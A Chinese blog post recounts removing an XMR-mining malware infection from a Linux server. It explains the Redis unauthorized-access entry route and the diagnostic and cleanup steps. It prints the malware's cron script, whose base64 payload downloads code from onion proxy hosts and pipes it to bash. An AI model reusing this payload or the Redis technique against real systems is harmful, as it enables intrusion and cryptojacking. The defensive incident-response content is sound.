Linux 中挖矿病毒处理过程

Linux 中挖矿病毒处理过程分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。进程占CPU700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。该病毒的侵入方式是通过扫描主机的Redis端口,一般默认为6379,通过Redis命令将程序注入到你的主机,Re…

大家好,又见面了,我是你们的朋友全栈君。

分享一次Linux系统杀毒的经历,还有个人的一些总结,希望对大家有用。

进程占CPU 700%,进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。最终发现是一个叫systemd或trump的病毒,是一个挖矿的病毒,在挖一种叫门罗币(XMR)的数字货币。

该病毒的侵入方式是通过扫描主机的Redis端口,一般默认为6379,通过Redis命令将程序注入到你的主机,Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器;如果Redis服务是以root权限启动,可以利用该问题直接获得服务器root权限

整个入侵流程大概是包含以下几个环节:

1、扫描开放6379端口的Linux服务器(后续感染扫描网段为1.0.0.0/16到224.255.0.0/16)

2、通过redis-cli尝试连接Redis并执行预置在.dat文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root,然后通过在Redis中插入数据,将下载执行脚本的动作写入crontab任务

3、通过脚本实现以上的相关行为,完成植入并启动挖矿程序

4、再编译安装pnscan,继续扫描感染下一个目标

逐渐排查并解决:

5. 查看进程实际运行应用

> ll /proc/26978/exe

lrwxrwxrwx 1 root root 0 Nov 18 05:12 /proc/26978/exe -> /usr/bin/f5ca2c418471f93c1e5a59fea5939e89 (deleted)

可以看到进程启动完就删除了

6. 查看进程的由来

> lsof -p 32559

COMMAND   PID USER   FD   TYPE     DEVICE SIZE/OFF   NODE NAME

wAMj4J  32559 root  cwd    DIR      253,1    20480 655363 /usr/bin

wAMj4J  32559 root  rtd    DIR      253,1     4096      2 /

wAMj4J  32559 root  txt    REG      253,1   260544 657105 /usr/bin/e48377a2d8e8e119d1454aa4cd5647c0 (deleted)

wAMj4J  32559 root    0u  IPv4 1769948316      0t0    TCP iZ2ze98732cvvbbjgcwf4wZ:35060->222.35.250.117:https (ESTABLISHED)

wAMj4J  32559 root    3w   REG      253,1        6 396140 /tmp/.X11-unix/1

可以看到源头是从/tmp下的一个子目录里的文件来的,从222.35.250.117上获取的木马代码,根据这个ip从网上查又查出这个地址其他人也碰到过类似的。先kill进程,顺便把/tmp目录下所有目录和文件删除。

https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

然后从这个网站下载busybox及clear.sh

为防止病毒将rm命令劫持,请将busybox工具箱上传到/bin/目录下,然后使用它进行删除

/bin/busybox rm -rf /tmp

查看定时任务

> crontab -l5 * * * * /root/.trump >/dev/null 2>&1

检查/root/.trump文件发现里面主要的代码都用base64编码了,可以用bejson.com解码看看内容,删除这个文件,通过 crontab -e删除定时任务。

> cat /root/.trump

#!/bin/bash

exec &>/dev/null

echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcHM0YzRvaHh2cTdvCnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMSkvaW87IHRoZW4KKAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLnNoIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash

7. 查找所有带trump的文件

> grep “trump” /etc/ -nri

Binary file /etc/udev/hwdb.bin matches/etc/cron.d/0trump:1:37 * * * * root /opt/trump >/dev/null 2>&1

删除 /etc/cron.d/0trump和/opt/trump

/bin/busybox rm -rf /etc/cron.d/0trump

/bin/busybox rm -rf /opt/trump

注:删除/opt/trump出现无法删除,chmod 777 也显示无权限,这时需执行chattr -i /opt/trump,然后再删除就可以了

最后为了安全,再执行下改良后的 clear.sh下文件,位置必须放在/bin/下

8.查看进程列表有无可疑进程(这个的目的是查找有无守护进程,自启的原因就是病毒主线程已经kill,但其守护进程没有kill掉)

> ps -lef

有2个进程叫ZY8Zrv和VcbzWG,查看由来也是从tmp相同目录来的,kill先。再发现2个可疑进程

0 S root      9736 22608  0  80   0 – 28296 do_wai 01:28 ?        00:00:00 sh -c echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c

0 S root     21043  9742  0  80   0 – 28056 do_wai 08:36 ?        00:00:00 timeout 1h ./ssh : 22 root ./pw

都kill掉。

8.设置redis密码。redis启动一定要设置密码。在redis.conf 中 requirepass XXX

参考脚本:https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/145072.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 初始java数组_初始化数组为0

    初始java数组_初始化数组为01.初始化定义2.数组的三种打印方式3.数组引用null4.浅谈引用变量的影响5.与数组相关的字符串操作以及javaJVM内存简单介绍6.浅谈二维数组与C的区别

    2022年10月21日
    3
  • 【Redis】集群

    【Redis】集群【Redis】集群

    2022年4月25日
    36
  • Jenkins 安装及使用 ( Jenkins 部署 Maven 项目、Jenkins 部署 Vue 项目)

    Jenkins 安装及使用 ( Jenkins 部署 Maven 项目、Jenkins 部署 Vue 项目)Jenkins安装部署及使用。包括Jenkins部署Vue项目,Jenkins部署Maven项目。

    2022年6月2日
    29
  • 超分辨率的数据增强Python(超分辨率重建是什么)

    python在图像超分辨率重建中的应用洪华秀[1];【期刊名称】《计算机产品与流通》【年(卷),期】2019(000)002【摘要】图像超分辨率重建技术是低分辨率图像经过一系列算法处理后转换成高分辨率图像的过程,随着图像数据的应用领域不断延伸,这一技术也逐渐成了图像处理研究热点之一。近几年Python语言在人工智能领域逐渐占领榜首,它的优越性在于强大的第三方数据处理工具的支持。本文在图像超分辨率重…

    2022年4月12日
    199
  • uml点餐系统活动图_UML 活动图

    uml点餐系统活动图_UML 活动图•活动图概述活动图概述•活动图和交互图是UML中对系统动态方面建模的两种主要形式•交互图强调的是对象到对象的控制流,而活动图则强调的是从活动到活动的控制流•活动图是一种表述过程基理、业务过程以及工作流的技术。它可以用来对业务过程、工作流建模,也可以对用例实现甚至是程序实现来建模•UML2.0而言,去除了“活动图是状态图的一种特例”这一规定•如何阅读活动图阅读简单活动图活动图的主要元素•初始节点和…

    2022年6月10日
    41
  • mysql 错误1062_mysql主从切换步骤

    mysql 错误1062_mysql主从切换步骤周末的时候,突然收到报警的短信,是一台slave服务器sql_thread不为YES,唉,还能不能愉快的过周末啊。上服务器一看是,是主键冲突导致从库中断,也是Last_SQL_Errno:1062错误,我们常用的方法是跳过错误,比如SETGLOBALSQL_SLAVE_SKIP_COUNTER=1或者直接slave-skip-errors=1062,这样确实解决了问题,恢复了复制。但是久而…

    2022年8月30日
    4

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号